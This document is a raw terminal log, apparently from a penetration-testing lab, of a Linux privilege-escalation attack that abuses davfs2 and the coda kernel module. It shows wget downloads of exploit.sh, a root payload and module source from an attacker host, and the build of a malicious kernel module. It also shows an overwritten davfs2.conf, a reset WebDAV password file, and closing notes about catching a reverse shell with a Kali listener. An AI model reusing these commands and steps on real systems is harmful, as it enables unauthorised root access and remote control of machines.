Untitled

$ cd /tmp
cd /tmp
$ wget http://10.11.0.31/paul/exploit.sh | wget http://10.11.0.31/paul/rootprog | wget http://10.11.0.31/paul/coda.c | wget http://10.11.0.31/paul/Makefile
wget http://10.11.0.31/paul/exploit.sh | wget http://10.11.0.31/paul/rootprog | wget http://10.11.0.31/paul/coda.c | wget http://10.11.0.31/paul/Makefile
--2016-06-18 05:45:52--  http://10.11.0.31/paul/Makefile
--2016-06-18 05:45:52--  http://10.11.0.31/paul/coda.c
Connecting to 10.11.0.31:80... Connecting to 10.11.0.31:80... --2016-06-18 05:45:52--  http://10.11.0.31/paul/exploit.sh
--2016-06-18 05:45:52--  http://10.11.0.31/paul/rootprog
Connecting to 10.11.0.31:80... Connecting to 10.11.0.31:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 158
Saving to: `Makefile'

200 OK
Length: 658 [text/x-csrc]
Saving to: `coda.c'

200 OK
Length: 3586 (3.5K) [text/x-sh]
Saving to: `exploit.sh'

200 OK
Length: 5132 (5.0K)
Saving to: `rootprog'

100%[======================================>] 658         --.-K/s   in 0s

2016-06-18 05:45:53 (60.6 MB/s) - `coda.c' saved [658/658]

100%[======================================>] 158         --.-K/s   in 0s

2016-06-18 05:45:53 (26.3 MB/s) - `Makefile' saved [158/158]

100%[======================================>] 5,132       --.-K/s   in 0s

2016-06-18 05:45:53 (456 MB/s) - `rootprog' saved [5132/5132]

100%[======================================>] 3,586       --.-K/s   in 0s

2016-06-18 05:45:53 (297 MB/s) - `exploit.sh' saved [3586/3586]

$ ls
ls
coda.c	exploit.sh  Makefile  mongodb-27017.sock  rootprog  vmware-root
$ chmod 777 *
chmod 777 *
chmod: changing permissions of `mongodb-27017.sock': Operation not permitted
chmod: changing permissions of `vmware-root': Operation not permitted
$ ./exploit.sh
./exploit.sh
#######################################
Specify the full path of the kernel module which you want to load
Leave empty if you wish to compile it now
Understand that you need kernel headers, make and gcc for successful compilation
#######################################


make -C /lib/modules/3.2.0-4-686-pae/build M=/tmp modules
make[1]: Entering directory `/usr/src/linux-headers-3.2.0-4-686-pae'
  CC [M]  /tmp/coda.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /tmp/coda.mod.o
  LD [M]  /tmp/coda.ko
make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-4-686-pae'
#######################################
Copying the modules in use for the running kernel in the local directory
#######################################
#######################################
Copying coda.ko module
#######################################
#######################################
Setting the 'modules.dep' and running depmod
#######################################
#######################################
Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is /tmp/rootprog
WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module
#######################################
/tmp/rootprog
/tmp/rootprog
cp: `/tmp/rootprog' and `/tmp/rootprog' are the same file
#######################################
Setting MODPROBE_OPTIONS variable
#######################################
#######################################
Now, check the the /home/davtest/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:
# General Options
# ---------------

# dav_user        davfs2            # system wide config file only
# dav_group       davfs2            # system wide config file only
# ignore_home                       # system wide config file only
kernel_fs       coda
# buf_size        16                 # KiByte
#######################################
#######################################
Then, check /etc/fstab for remote webdav servers which the user can mount, eg:
https://www.crushftp.com/demo/   /home/foo/dav   davfs   noauto,user   0   0
#######################################
#######################################
If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'
#######################################

davtest@humble:/tmp$ ls
ls
coda.c	    coda.mod.o	lib		modules.order	    rootprog
coda.ko     coda.o	Makefile	Module.symvers	    vmware-root
coda.mod.c  exploit.sh	modules.dep.ok	mongodb-27017.sock
davtest@humble:/tmp$ cd /home/davtest/.davfs2
cd /home/davtest/.davfs2
davtest@humble:~/.davfs2$ wget http://10.11.0.31/paul/davfs2.conf
wget http://10.11.0.31/paul/davfs2.conf
--2016-06-18 05:55:22--  http://10.11.0.31/paul/davfs2.conf
Connecting to 10.11.0.31:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2167 (2.1K)
Saving to: `davfs2.conf.1'

100%[======================================>] 2,167       --.-K/s   in 0s

2016-06-18 05:55:23 (6.74 MB/s) - `davfs2.conf.1' saved [2167/2167]

davtest@humble:~/.davfs2$ mv davfs2.conf.1 davfs2.conf
mv davfs2.conf.1 davfs2.conf
davtest@humble:~/.davfs2$ cd /var/www/web1
cd /var/www/web1
davtest@humble:/var/www/web1$ ls -la
ls -la
total 16
drwxr-xr-x 3 root     root     4096 Dec 26  2013 .
drwxr-xr-x 3 root     root     4096 Dec 26  2013 ..
-rw-r----- 1 davtest  www-data   43 Dec 26  2013 passwd.dav
drwxr-xr-x 2 www-data root     4096 Dec 26  2013 web
davtest@humble:/var/www/web1$ htpasswd -c /var/www/web1/passwd.dav test
htpasswd -c /var/www/web1/passwd.dav test
New password: test

Re-type new password: test

Adding password for user test
davtest@humble:/var/www/web1$ cat passwd.dav
ls
cat passwd.dav
test:$apr1$wCk.6j4z$/g2zDYMVzlmRvXAW/jV1F0
davtest@humble:/var/www/web1$ ls
passwd.dav  web
davtest@humble:/var/www/web1$ ls
ls
passwd.dav  web
davtest@humble:/var/www/web1$ ls -la
ls -la
total 16
drwxr-xr-x 3 root     root     4096 Dec 26  2013 .
drwxr-xr-x 3 root     root     4096 Dec 26  2013 ..
-rw-r----- 1 davtest  www-data   43 Jun 18 06:01 passwd.dav
drwxr-xr-x 2 www-data root     4096 Dec 26  2013 web
davtest@humble:/var/www/web1$ cat passwd.dav
cat passwd.dav
test:$apr1$wCk.6j4z$/g2zDYMVzlmRvXAW/jV1F0
davtest@humble:/var/www/web1$ cd /home/davtest/.davfs2
cd /home/davtest/.davfs2
davtest@humble:~/.davfs2$ cat davfs2.conf
cat davfs2.conf
# davfs2 configuration file 2009-04-12
# version 9
# ------------------------------------

# Copyright (C) 2006, 2007, 2008, 2009 Werner Baumann

# Copying and distribution of this file, with or without modification, are
# permitted in any medium without royalty provided the copyright notice
# and this notice are preserved.


# Please read the davfs2.conf (5) man page for a description of the
# configuration options and syntax rules.


# Available options and default values
# ====================================

# General Options
# ---------------

# dav_user        davfs2            # system wide config file only
# dav_group       davfs2            # system wide config file only
# ignore_home                       # system wide config file only
kernel_fs       coda
# buf_size        16                 # KiByte

# WebDAV Related Options
# ----------------------

# use_proxy       1                 # system wide config file only
# proxy                             # system wide config file only
# servercert
# clientcert
# secrets         ~/.davfs2/secrets # user config file only
# ask_auth        1
# use_locks       1
# lock_owner      <user-name>
# lock_timeout    1800              # seconds
# lock_refresh    60                # seconds
# use_expect100   0
# if_match_bug    0
# drop_weak_etags 0
# allow_cookie    0
# precheck        1
# ignore_dav_header 0
# server_charset
# connect_timeout 10                # seconds
# read_timeout    30                # seconds
# retry           30                # seconds
# max_retry       300               # seconds
# add_header

# Cache Related Options
# ---------------------

# backup_dir      lost+found
# cache_dir       /var/cache/davfs2 # system wide cache
#                 ~/.davfs2/cache   # per user cache
# cache_size      50                # MiByte
# table_size      1024
# dir_refresh     60                # seconds
# file_refresh    1                 # second
# delay_upload    10
# gui_optimize    0

# Debugging Options
# -----------------

# debug           # possible values: config, kernel, cache, http, xml,
                  #      httpauth, locks, ssl, httpbody, secrets, most


davtest@humble:~/.davfs2$ ls
ls
cache  certs  davfs2.conf  secrets
davtest@humble:~/.davfs2$ mount /home/davtest/dav
mount /home/davtest/dav
Please enter the username to authenticate with server
http://127.0.0.1/webdav/ or hit enter for none.
  Username: test
test
Please enter the password to authenticate user test with server
http://127.0.0.1/webdav/ or hit enter for none.
  Password:  test

libkmod: ERROR ../libkmod/libkmod.c:554 kmod_search_moddep: could not open moddep file '/tmp/lib/modules/3.2.0-4-686-pae/modules.dep.bin'
davtest@humble:~/.davfs2$ locate modules.dep.bin


Second Output


/sbin/mount.davfs: no free coda device to mount
/sbin/mount.davfs: trying fuse kernel file system
/sbin/mount.davfs: fuse device opened successfully


what i id


4) run ./exploit.sh
5) move passwd.dav to replace /var/www/web1/passwd.dav
6) move davfs2.conf to replace /home/davtest/.davfs2/davfs2.conf
7) don't forget to start your Kali listener to receive your shell
8) mount /home/davtest/dav